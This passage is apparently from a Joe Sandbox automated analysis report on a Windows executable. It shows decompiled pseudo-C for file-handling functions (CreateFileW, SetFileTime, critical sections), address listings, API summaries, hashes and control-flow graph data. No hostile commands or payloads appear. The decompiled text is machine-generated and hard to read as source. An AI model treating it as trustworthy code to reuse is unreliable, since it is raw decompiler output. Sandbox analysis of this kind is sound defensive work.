									E0040640D(_t678 - 0x14,  *(_t678 + 8));
									__eflags =  *((char*)(_t658 + 0x68));
									if(__eflags != 0) {
										E0040A0DE( *((intOrPtr*)(_t658 + 0x6c)), _t678, __eflags,  *(_t678 + 8));
									}
									L43:
									_push(_t678 - 0x14);
									E0040BAB0(_t658 + 0x78);
									_t482 =  *(_t678 - 0x14);
									 *(_t678 - 4) = 0xa;
									__eflags = _t482;
									if(_t482 != 0) {
										 *((intOrPtr*)( *_t482 + 8))(_t482);
									}
									_t483 =  *(_t678 + 8);
									 *(_t678 - 4) = 9;
									__eflags = _t483;
									if(_t483 != 0) {
										 *((intOrPtr*)( *_t483 + 8))(_t483);
									}
									_t484 =  *(_t678 + 0x10);
									 *(_t678 - 4) = 5;
									__eflags = _t484;
									if(_t484 != 0) {
										 *((intOrPtr*)( *_t484 + 8))(_t484);
									}
									 *(_t678 - 0x10) =  *(_t678 - 0x10) + 1;
									__eflags =  *(_t678 - 0x10) -  *(_t678 - 0x18);
									if(__eflags < 0) {
										continue;
									} else {
										goto L50;
									}
								}
								__eflags =  *((intOrPtr*)(_t676 + 0x18)) - 1;
								if( *((intOrPtr*)(_t676 + 0x18)) != 1) {
									goto L40;
								}
								_t626 =  *(_t678 + 0x10);
								__eflags = _t626;
								if(_t626 == 0) {
									_t490 =  *(_t678 + 8);
									 *(_t678 - 4) = 9;
									__eflags = _t490;
									if(_t490 != 0) {
										 *((intOrPtr*)( *_t490 + 8))(_t490);
										_t626 =  *(_t678 + 0x10);
									}
									__eflags = _t626;
									 *(_t678 - 4) = 5;
									if(_t626 != 0) {
										 *((intOrPtr*)( *_t626 + 8))(_t626);
									}
									 *(_t678 - 4) = 0xe;
									E004042AD(_t678 - 0xa8);
									 *(_t678 - 4) = 1;
									E004099BC(_t678 - 0xf8, __eflags);
									 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
									DeleteCriticalSection(_t678 - 0x4c);
									E00403800(_t678 - 0x50);
									 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
									 *(_t678 - 4) = 0xf;
									_t668 = 0x80004001;
									goto L109;
								}
								E0040640D(_t678 - 0x14, _t626);
								__eflags =  *((intOrPtr*)(_t658 + 0x68)) - _t539;
								if(__eflags != 0) {
									E0040A0B9( *((intOrPtr*)(_t658 + 0x6c)), _t678, __eflags,  *(_t678 + 0x10));
								}
								goto L43;
							}
							_t463 =  *(_t678 + 8);
							 *(_t678 - 4) = 9;
							__eflags = _t463;
							if(_t463 != 0) {
								 *((intOrPtr*)( *_t463 + 8))(_t463);
							}
							_t464 =  *(_t678 + 0x10);
							 *(_t678 - 4) = 5;
							__eflags = _t464;
							if(_t464 != 0) {
								 *((intOrPtr*)( *_t464 + 8))(_t464);
							}
							 *(_t678 - 4) = 0xb;
							E004042AD(_t678 - 0xa8);
							 *(_t678 - 4) = 1;
							E004099BC(_t678 - 0xf8, __eflags);
							 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
							DeleteCriticalSection(_t678 - 0x4c);
							E00403800(_t678 - 0x50);
							 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
							 *(_t678 - 4) = 0xc;
							_t668 = _t539;
							goto L109;
						} else {
							 *(_t678 - 4) = 7;
							E004042AD(_t678 - 0xa8);
							 *(_t678 - 4) = 1;
							E004099BC(_t678 - 0xf8, _t700);
							 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
							DeleteCriticalSection(_t678 - 0x4c);
							E00403800(_t678 - 0x50);
							 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
							 *(_t678 - 4) = 8;
							L109:
							E004042D6();
							 *(_t678 - 4) =  *(_t678 - 4) | 0xffffffff;
							E004042AD(_t678 - 0x2c);
							L113:
							_t373 = _t668;
							goto L114;
						}
					}
					_t510 = E0040B753(_t678 - 0xf8, _t658 + 4);
					asm("sbb al, al");
					_t512 =  ~_t510 + 1;
					 *((char*)(_t678 + 0xb)) = _t512;
					if(_t512 == 0) {
						goto L51;
					}
					goto L21;
				} else {
					_t540 =  *((intOrPtr*)(_t678 + 0x14));
					do {
						_push(0x18);
						_t513 = E00403A76();
						if(_t513 == 0) {
							_t662 = 0;
							__eflags = 0;
						} else {
							 *(_t513 + 4) =  *(_t513 + 4) & 0x00000000;
							 *_t513 = 0x41b6e8;
							_t662 = _t513;
						}
						 *((intOrPtr*)(_t678 - 0x34)) = _t662;
						if(_t662 != 0) {
							 *((intOrPtr*)( *_t662 + 4))(_t662);
						}
						_push(0x28);
						 *((intOrPtr*)(_t662 + 8)) = _t678 - 0x50;
						 *((intOrPtr*)(_t662 + 0x10)) =  *((intOrPtr*)(_t678 + 0xc));
						 *(_t662 + 0x14) =  *(_t678 + 0x10);
						 *((intOrPtr*)(_t678 + 0xc)) =  *((intOrPtr*)(_t678 + 0xc)) +  *_t540;
						 *(_t678 - 4) = 2;
						asm("adc [ebp+0x10], ecx");
						_t518 = E00403A76();
						if(_t518 == 0) {
							_t677 = 0;
							__eflags = 0;
						} else {
							 *(_t518 + 4) =  *(_t518 + 4) & 0x00000000;
							 *(_t518 + 8) =  *(_t518 + 8) & 0x00000000;
							 *_t518 = 0x41b6d8;
							_t677 = _t518;
						}
						 *(_t678 - 0x18) = _t677;
						if(_t677 != 0) {
							 *((intOrPtr*)( *_t677 + 4))(_t677);
						}
						_t34 = _t677 + 8; // 0x8
						 *(_t678 - 4) = 3;
						E0040640D(_t34, _t662);
						 *(_t677 + 0x18) =  *(_t677 + 0x18) & 0x00000000;
						 *(_t677 + 0x1c) =  *(_t677 + 0x1c) & 0x00000000;
						 *(_t677 + 0x20) =  *(_t677 + 0x20) & 0x00000000;
						 *((intOrPtr*)(_t677 + 0x10)) =  *_t540;
						 *((intOrPtr*)(_t677 + 0x14)) =  *((intOrPtr*)(_t540 + 4));
						_push(_t678 - 0x18);
						E0040A5E4(_t678 - 0x2c);
						_t523 =  *(_t678 - 0x18);
						 *(_t678 - 4) = 2;
						if(_t523 != 0) {
							 *((intOrPtr*)( *_t523 + 8))(_t523);
						}
						 *(_t678 - 4) = 1;
						if(_t662 != 0) {
							 *((intOrPtr*)( *_t662 + 8))(_t662);
						}
						 *(_t678 + 8) =  *(_t678 + 8) + 1;
						_t540 = _t540 + 8;
					} while ( *(_t678 + 8) <  *((intOrPtr*)( *(_t678 + 0x18) + 0x30)));
					_t658 =  *((intOrPtr*)(_t678 - 0x30));
					goto L19;
				}
			}



























































                              0x0040ad1e
                              0x0040ad2b
                              0x0040ad2f
                              0x0040ad33
                              0x0040ad3d
                              0x0040b2d7
                              0x0040b2d7
                              0x0040b605
                              0x0040b60b
                              0x0040b613
                              0x0040b613
                              0x0040ad46
                              0x0040ad4b
                              0x0040ad57
                              0x0040ad5a
                              0x0040ad5d
                              0x0040ad68
                              0x0040ad6c
                              0x0040ad74
                              0x0040ad79
                              0x0040ae60
                              0x0040ae69
                              0x0040ae6c
                              0x0040ae6f
                              0x0040ae7a
                              0x0040ae7e
                              0x0040ae8b
                              0x0040ae8f
                              0x0040ae97
                              0x0040aeb6
                              0x0040aeb9
                              0x0040aebe
                              0x0040aec1
                              0x0040aec6
                              0x0040aecb
                              0x0040aece
                              0x0040aece
                              0x0040aed5
                              0x0040aed7
                              0x0040aedc
                              0x0040aee2
                              0x0040aee7
                              0x0040aeeb
                              0x0040aef6
                              0x0040aef6
                              0x0040aeed
                              0x0040aeef
                              0x0040aeef
                              0x0040aefb
                              0x0040aeff
                              0x0040af02
                              0x0040af07
                              0x0040af0c
                              0x0040af13
                              0x0040af13
                              0x0040af0e
                              0x0040af0e
                              0x0040af0e
                              0x0040af15
                              0x0040af15
                              0x0040af26
                              0x0040af28
                              0x0040af2a
                              0x0040af73
                              0x0040af77
                              0x0040af79
                              0x0040b05f
                              0x0040b069
                              0x0040b06e
                              0x0040b071
                              0x0040b076
                              0x0040b079
                              0x0040b07b
                              0x0040b07e
                              0x0040b081
                              0x0040b084
                              0x0040b087
                              0x0040b4bf
                              0x0040b4d8
                              0x0040b4dd
                              0x0040b4e1
                              0x0040b4e9
                              0x0040b4e9
                              0x0040b4ec
                              0x0040b4ef
                              0x0040b556
                              0x0040b55b
                              0x0040b56e
                              0x0040b572
                              0x0040b579
                              0x0040b57b
                              0x0040b57e
                              0x0040b599
                              0x0040b59f
                              0x0040b5a9
                              0x0040b5c2
                              0x0040b5c4
                              0x0040b5c8
                              0x0040b5d3
                              0x0040b5d7
                              0x0040b5e2
                              0x0040b5e6
                              0x0040b5eb
                              0x0040b5f2
                              0x0040b5f7
                              0x0040b5f7
                              0x0040b5f7
                              0x0040b5fe
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040b580
                              0x0040b580
                              0x0040b58e
                              0x0040b593
                              0x0040b594
                              0x0040b594
                              0x00000000
                              0x0040b4f1
                              0x0040b4f7
                              0x0040b4fb
                              0x0040b506
                              0x0040b50a
                              0x0040b50f
                              0x0040b517
                              0x0040b520
                              0x0040b525
                              0x0040b52c
                              0x0040b533
                              0x0040b533
                              0x00000000
                              0x0040b533
                              0x0040b4ef
                              0x0040b08d
                              0x0040b090
                              0x0040b093
                              0x0040b099
                              0x0040b09d
                              0x0040b0af
                              0x0040b0bd
                              0x0040b0c1
                              0x0040b0c3
                              0x0040b0c6
                              0x0040b0c8
                              0x0040b0f3
                              0x0040b0f3
                              0x0040b0f5
                              0x0040b0f9
                              0x0040b0fe
                              0x0040b0fe
                              0x0040b101
                              0x0040b104
                              0x0040b108
                              0x0040b110
                              0x0040b115
                              0x0040b121
                              0x0040b125
                              0x0040b12a
                              0x0040b135
                              0x0040b139
                              0x0040b142
                              0x0040b147
                              0x0040b149
                              0x0040b163
                              0x0040b163
                              0x0040b167
                              0x0040b169
                              0x00000000
                              0x00000000
                              0x0040b16f
                              0x0040b172
                              0x0040b172
                              0x0040b175
                              0x0040b177
                              0x0040b179
                              0x0040b2e5
                              0x0040b2e5
                              0x0040b2e5
                              0x0040b2e8
                              0x0040b2e8
                              0x0040b2ea
                              0x0040b2f8
                              0x0040b2fb
                              0x0040b2fd
                              0x0040b2ff
                              0x0040b310
                              0x0040b310
                              0x0040b310
                              0x0040b313
                              0x0040b313
                              0x0040b315
                              0x0040b44a
                              0x0040b44e
                              0x0040b456
                              0x0040b45a
                              0x0040b465
                              0x0040b469
                              0x0040b474
                              0x0040b478
                              0x0040b47d
                              0x0040b485
                              0x0040b48e
                              0x0040b493
                              0x0040b49d
                              0x0040b4a4
                              0x0040b4a9
                              0x0040b4b0
                              0x0040b4b5
                              0x00000000
                              0x0040b4b5
                              0x0040b31b
                              0x00000000
                              0x0040b31b
                              0x0040b301
                              0x0040b304
                              0x0040b304
                              0x0040b306
                              0x00000000
                              0x00000000
                              0x0040b308
                              0x0040b309
                              0x0040b30c
                              0x0040b30e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040b30e
                              0x0040b37e
                              0x00000000
                              0x0040b37e
                              0x0040b2ef
                              0x0040b2f3
                              0x00000000
                              0x0040b2f3
                              0x0040b17f
                              0x0040b182
                              0x0040b182
                              0x0040b184
                              0x00000000
                              0x00000000
                              0x0040b18a
                              0x0040b18b
                              0x0040b18e
                              0x0040b190
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040b192
                              0x0040b2e1
                              0x00000000
                              0x0040b31e
                              0x0040b325
                              0x0040b32a
                              0x0040b32d
                              0x0040b32e
                              0x0040b331
                              0x0040b331
                              0x00000000
                              0x0040b14b
                              0x0040b14b
                              0x0040b158
                              0x0040b15d
                              0x0040b160
                              0x0040b160
                              0x0040b160
                              0x00000000
                              0x0040b14b
                              0x0040b149
                              0x0040b0ca
                              0x0040b0cd
                              0x0040b0d0
                              0x0040b0d3
                              0x0040b382
                              0x0040b384
                              0x0040b388
                              0x0040b38d
                              0x0040b38d
                              0x0040b396
                              0x0040b39a
                              0x0040b3a5
                              0x0040b3a9
                              0x0040b3ae
                              0x0040b3b6
                              0x0040b3bf
                              0x0040b3c4
                              0x0040b3cb
                              0x0040b3d2
                              0x0040b42c
                              0x0040b42f
                              0x0040b434
                              0x0040b43b
                              0x0040b440
                              0x00000000
                              0x0040b440
                              0x0040b0e6
                              0x0040b0e8
                              0x0040b0ea
                              0x0040b3d9
                              0x0040b3dc
                              0x0040b3e0
                              0x0040b3e2
                              0x0040b3e7
                              0x0040b3e7
                              0x0040b3f0
                              0x0040b3f4
                              0x0040b3ff
                              0x0040b403
                              0x0040b408
                              0x0040b408
                              0x0040b408
                              0x0040b410
                              0x0040b419
                              0x0040b41e
                              0x0040b425
                              0x00000000
                              0x0040b425
                              0x0040b0f0
                              0x00000000
                              0x0040b33a
                              0x0040b340
                              0x0040b34c
                              0x0040b352
                              0x0040b356
                              0x0040b35e
                              0x0040b362
                              0x0040b367
                              0x0040b368
                              0x0040b36b
                              0x0040b36b
                              0x0040b374
                              0x0040b377
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040af7f
                              0x0040af7f
                              0x0040af88
                              0x0040af8d
                              0x0040af90
                              0x0040af93
                              0x0040af97
                              0x0040af9d
                              0x0040afa1
                              0x0040afa3
                              0x0040afa8
                              0x0040afaa
                              0x0040afac
                              0x00000000
                              0x00000000
                              0x0040afb2
                              0x0040afb5
                              0x0040afb9
                              0x0040afbd
                              0x0040afeb
                              0x0040afeb
                              0x0040afef
                              0x0040b270
                              0x0040b273
                              0x0040b277
                              0x0040b279
                              0x0040b27e
                              0x0040b27e
                              0x0040b287
                              0x0040b28b
                              0x0040b296
                              0x0040b29a
                              0x0040b29f
                              0x0040b2a7
                              0x0040b2b0
                              0x0040b2b5
                              0x0040b2bf
                              0x0040b2c6
                              0x0040b2cb
                              0x0040b2cb
                              0x0040b2cb
                              0x0040b2d2
                              0x00000000
                              0x0040b2d2
                              0x0040affb
                              0x0040b000
                              0x0040b004
                              0x0040b00c
                              0x0040b00c
                              0x0040b011
                              0x0040b017
                              0x0040b018
                              0x0040b01d
                              0x0040b020
                              0x0040b024
                              0x0040b026
                              0x0040b02b
                              0x0040b02b
                              0x0040b02e
                              0x0040b031
                              0x0040b035
                              0x0040b037
                              0x0040b03c
                              0x0040b03c
                              0x0040b03f
                              0x0040b042
                              0x0040b046
                              0x0040b048
                              0x0040b04d
                              0x0040b04d
                              0x0040b050
                              0x0040b056
                              0x0040b059
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040b059
                              0x0040afbf
                              0x0040afc3
                              0x00000000
                              0x00000000
                              0x0040afc5
                              0x0040afc8
                              0x0040afca
                              0x0040b202
                              0x0040b205
                              0x0040b209
                              0x0040b20b
                              0x0040b210
                              0x0040b213
                              0x0040b213
                              0x0040b216
                              0x0040b218
                              0x0040b21c
                              0x0040b221
                              0x0040b221
                              0x0040b22a
                              0x0040b22e
                              0x0040b239
                              0x0040b23d
                              0x0040b242
                              0x0040b24a
                              0x0040b253
                              0x0040b258
                              0x0040b25f
                              0x0040b266
                              0x00000000
                              0x0040b266
                              0x0040afd4
                              0x0040afd9
                              0x0040afdc
                              0x0040afe4
                              0x0040afe4
                              0x00000000
                              0x0040afdc
                              0x0040b197
                              0x0040b19a
                              0x0040b19e
                              0x0040b1a0
                              0x0040b1a5
                              0x0040b1a5
                              0x0040b1a8
                              0x0040b1ab
                              0x0040b1af
                              0x0040b1b1
                              0x0040b1b6
                              0x0040b1b6
                              0x0040b1bf
                              0x0040b1c3
                              0x0040b1ce
                              0x0040b1d2
                              0x0040b1d7
                              0x0040b1df
                              0x0040b1e8
                              0x0040b1ed
                              0x0040b1f4
                              0x0040b1fb
                              0x00000000
                              0x0040af2c
                              0x0040af32
                              0x0040af36
                              0x0040af41
                              0x0040af45
                              0x0040af4a
                              0x0040af52
                              0x0040af5b
                              0x0040af60
                              0x0040af67
                              0x0040b535
                              0x0040b538
                              0x0040b53d
                              0x0040b544
                              0x0040b603
                              0x0040b603
                              0x00000000
                              0x0040b603
                              0x0040af2a
                              0x0040aea2
                              0x0040aea9
                              0x0040aeab
                              0x0040aead
                              0x0040aeb0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040ad7f
                              0x0040ad7f
                              0x0040ad82
                              0x0040ad82
                              0x0040ad84
                              0x0040ad8c
                              0x0040ad9c
                              0x0040ad9c
                              0x0040ad8e
                              0x0040ad8e
                              0x0040ad92
                              0x0040ad98
                              0x0040ad98
                              0x0040ada0
                              0x0040ada3
                              0x0040ada8
                              0x0040ada8
                              0x0040adae
                              0x0040adb0
                              0x0040adb6
                              0x0040adbc
                              0x0040adc1
                              0x0040adc7
                              0x0040adcb
                              0x0040adce
                              0x0040add6
                              0x0040adea
                              0x0040adea
                              0x0040add8
                              0x0040add8
                              0x0040addc
                              0x0040ade0
                              0x0040ade6
                              0x0040ade6
                              0x0040adee
                              0x0040adf1
                              0x0040adf6
                              0x0040adf6
                              0x0040adfa
                              0x0040adfd
                              0x0040ae01
                              0x0040ae0b
                              0x0040ae0f
                              0x0040ae13
                              0x0040ae17
                              0x0040ae1d
                              0x0040ae20
                              0x0040ae24
                              0x0040ae29
                              0x0040ae2c
                              0x0040ae32
                              0x0040ae37
                              0x0040ae37
                              0x0040ae3c
                              0x0040ae40
                              0x0040ae45
                              0x0040ae45
                              0x0040ae48
                              0x0040ae51
                              0x0040ae54
                              0x0040ae5d
                              0x00000000
                              0x0040ae5d

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040AD1E
                                • Part of subcall function 0040D7CC: __EH_prolog.LIBCMT ref: 0040D7D1
                                • Part of subcall function 00413310: InitializeCriticalSection.KERNEL32(?,?,?,00000000,00000000), ref: 0041333E
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040AF52
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B1DF
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B24A
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B2A7
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B3B6
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B410
                              • DeleteCriticalSection.KERNEL32(?,?,?,00000004,00000004), ref: 0040B485
                              • DeleteCriticalSection.KERNEL32(?), ref: 0040B517
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$Delete$H_prolog$Initialize
                              • String ID:
                              • API String ID: 3452124646-0
                              • Opcode ID: 5f6b8a8cdbdc89edeaeca9fb6a48680f4fe42b6689f54ac84f6a401f85157967
                              • Instruction ID: 06aa0bffc57edc8446930be4fb3d3ecc4288fdccd94c57135405988f21593cb0
                              • Opcode Fuzzy Hash: 5f6b8a8cdbdc89edeaeca9fb6a48680f4fe42b6689f54ac84f6a401f85157967
                              • Instruction Fuzzy Hash: 5D625E7090024ADFDB14DFA4C944BDDBBB4EF14308F1480AEE815B72D2DB789A49DB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004059B3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62fileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              C-Code - Quality: 80%
                              			E004059B3(void** __ecx) {
				signed int _t23;
				void* _t24;
				signed int _t26;
				intOrPtr* _t29;
				signed int _t31;
				void** _t50;
				void* _t52;
				intOrPtr _t57;

				E00413954(E00419734, _t52);
				_t57 =  *0x423148; // 0x1
				_t50 = __ecx;
				if(_t57 != 0) {
					_t23 = E00405A63(__ecx);
					__eflags = _t23;
					if(_t23 != 0) {
						_t14 = _t52 + 0x14; // 0x414be4
						_t24 = CreateFileW( *(_t52 + 8),  *(_t52 + 0xc),  *(_t52 + 0x10), 0,  *_t14,  *(_t52 + 0x18), 0); // executed
						__eflags = _t24 - 0xffffffff;
						_t19 = _t24 != 0xffffffff;
						__eflags = _t19;
						 *_t50 = _t24;
						_t23 = 0 | _t19;
					}
				} else {
					E00401C80(_t52 - 0x18,  *(_t52 + 8));
					 *((intOrPtr*)(_t52 - 4)) = 0;
					_t26 = AreFileApisANSI();
					asm("sbb eax, eax");
					_push( ~_t26 + 1);
					_t29 = E00403D04(_t52 - 0x24);
					 *((char*)(_t52 - 4)) = 1;
					_t8 = _t52 + 0x14; // 0x414be4
					_t31 = E0040597A(_t50, _t57,  *_t29,  *(_t52 + 0xc),  *(_t52 + 0x10),  *_t8,  *(_t52 + 0x18));
					E00403A9C( *((intOrPtr*)(_t52 - 0x24)));
					E00403A9C( *((intOrPtr*)(_t52 - 0x18)));
					_t23 = _t31;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
				return _t23;
			}











                              0x004059b8
                              0x004059c3
                              0x004059ca
                              0x004059cc
                              0x00405a27
                              0x00405a2c
                              0x00405a2e
                              0x00405a34
                              0x00405a41
                              0x00405a49
                              0x00405a4c
                              0x00405a4c
                              0x00405a4f
                              0x00405a51
                              0x00405a51
                              0x004059ce
                              0x004059d4
                              0x004059d9
                              0x004059dc
                              0x004059e4
                              0x004059ed
                              0x004059ee
                              0x004059fa
                              0x004059fe
                              0x00405a08
                              0x00405a12
                              0x00405a1a
                              0x00405a20
                              0x00405a22
                              0x00405a58
                              0x00405a60

                              APIs
                              • __EH_prolog.LIBCMT ref: 004059B8
                              • AreFileApisANSI.KERNEL32(?,?,00000000,00000003,?,00000000,?,00000000), ref: 004059DC
                                • Part of subcall function 0040597A: CreateFileA.KERNEL32(?,00000001,?,00000000,?,?,00000000,?,KA,00405A0D,?,?,?,KA,?,00000001), ref: 0040599C
                              • CreateFileW.KERNELBASE(?,?,?,00000000,KA,?,00000000,?,00000000,00000003,?,00000000,?,00000000), ref: 00405A41
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: File$Create$ApisH_prolog
                              • String ID: KA
                              • API String ID: 1948390111-4133974868
                              • Opcode ID: f88b55b959810e929b2353b4b1d1eb61229a220c48e216d77a80ee84dd8b33a8
                              • Instruction ID: 6ceee1153368ae3910bf8b124445a1a72b78f4c7609cf7ab69cd6f34e54ac91e
                              • Opcode Fuzzy Hash: f88b55b959810e929b2353b4b1d1eb61229a220c48e216d77a80ee84dd8b33a8
                              • Instruction Fuzzy Hash: E0118E72A00109EFCF01AFA4D8818DE7F76EF08318F10412AF512B21A1CB398A65DF94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040483F Relevance: 6.0, APIs: 4, Instructions: 36filetimeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 719 40483f-40484b 720 404859-404876 CreateFileW 719->720 721 40484d-404857 SetLastError 719->721 723 404894-404896 720->723 724 404878-40488e SetFileTime CloseHandle 720->724 722 404897-404899 721->722 723->722 724->723
                              C-Code - Quality: 100%
                              			E0040483F(WCHAR* __ecx, FILETIME* __edx, FILETIME* _a4, FILETIME* _a8) {
				void* _t5;
				int _t7;
				signed int _t10;
				FILETIME* _t13;
				void* _t15;
				void* _t17;

				_t10 = 0;
				_t17 =  *0x423148 - _t10; // 0x1
				_t13 = __edx;
				if(_t17 != 0) {
					_t5 = CreateFileW(__ecx, 0x40000000, 3, 0, 3, 0x2000000, 0); // executed
					_t15 = _t5;
					if(_t15 != 0xffffffff) {
						_t7 = SetFileTime(_t15, _t13, _a4, _a8); // executed
						_t10 = 0 | _t7 != 0x00000000;
						CloseHandle(_t15);
					}
					return _t10;
				}
				SetLastError(0x78);
				return 0;
			}









                              0x00404840
                              0x00404842
                              0x00404849
                              0x0040484b
                              0x0040486b
                              0x00404871
                              0x00404876
                              0x00404882
                              0x0040488b
                              0x0040488e
                              0x0040488e
                              0x00000000
                              0x00404896
                              0x0040484f
                              0x00000000

                              APIs
                              • SetLastError.KERNEL32(00000078,0041B370,00000000,00402AAF,00000000,?,?,?,?), ref: 0040484F
                              • CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000,?,?,?,?), ref: 0040486B
                              • SetFileTime.KERNELBASE(00000000,00000000,?,?,?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000), ref: 00404882
                              • CloseHandle.KERNEL32(00000000,?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000,?,?,?), ref: 0040488E
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: File$CloseCreateErrorHandleLastTime
                              • String ID:
                              • API String ID: 2291555494-0
                              • Opcode ID: ff746e65f9cee30ffc8bafec341a8eb05b102094c88bf525f6141f2248b114e2
                              • Instruction ID: 64467d0e5ceda328e6e32eae128236dd02d513a4ef1926b956b8d25c0d97de23
                              • Opcode Fuzzy Hash: ff746e65f9cee30ffc8bafec341a8eb05b102094c88bf525f6141f2248b114e2
                              • Instruction Fuzzy Hash: B4F0E2762803507BE2302B60AC48F9B6E5CDBC9B25F108535B2A5A20E0C2294D1992B8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00408524 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 328COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 725 408524-40853c call 413954 728 408546-408579 call 40455d call 402170 725->728 729 40853e-408544 725->729 735 4085c5-4085dd call 4032a8 728->735 736 40857b-40857e 728->736 729->728 742 4085ef-4085f9 735->742 743 4085df-4085ed call 4039df 735->743 738 408582-408586 736->738 740 408590-408594 738->740 741 408588-40858a 738->741 746 408599-40859b 740->746 744 408596 741->744 745 40858c-40858e 741->745 748 4085fb-40860c call 4088ce 742->748 749 40863c-408640 742->749 759 40865e-408664 743->759 744->746 745->738 746->735 750 40859d-4085c4 call 401e19 call 401d7a call 403a9c 746->750 766 40862d-408631 call 4039df 748->766 767 40860e-40862b call 404407 748->767 751 408642-408646 749->751 752 40865c 749->752 750->735 757 408652-408657 call 4042eb 751->757 758 408648-40864d 751->758 752->759 757->752 762 408736-408755 call 4042ad call 403a9c * 2 758->762 764 408733-408735 759->764 765 40866a-40866f 759->765 793 408756-408764 762->793 764->762 772 408671-408678 call 4065b2 765->772 773 408683-4086ad call 40640d 765->773 776 408636-40863a 766->776 767->776 781 40867b-40867d 772->781 787 4086b5-4086b8 773->787 788 4086af-4086b3 773->788 776->748 776->749 781->773 782 408767-408769 781->782 782->762 791 4086d0-4086ea 787->791 792 4086ba-4086c7 787->792 790 408724-40872d 788->790 790->764 790->765 797 40876b-408774 791->797 798 4086ec-408701 791->798 856 4086c8 call 40df69 792->856 857 4086c8 call 40d1ab 792->857 794 4086cb-4086ce 796 408709-40870d 794->796 801 4087a1-4087a4 796->801 802 408713-40871c 796->802 799 408776-408778 797->799 800 40877c-40879f call 4042ad call 403a9c * 2 797->800 798->796 808 408703-408705 798->808 799->800 800->793 805 4087a6-4087af 801->805 806 4087bf-4087de 801->806 802->790 803 40871e-408720 802->803 803->790 810 4087b1-4087b3 805->810 811 4087b7-4087ba 805->811 814 4087e0-4087e8 806->814 815 4087f8-40881b call 405e34 call 40640d 806->815 808->796 810->811 811->762 817 4087ea 814->817 818 4087ef-4087f3 call 401d1b 814->818 826 408879-408886 call 4088ce 815->826 827 40881d-408877 call 401c80 * 2 call 407d82 call 401d7a call 403a9c * 3 815->827 817->818 818->815 832 408888 826->832 833 40888a-4088b5 call 407d82 call 401d7a call 403a9c 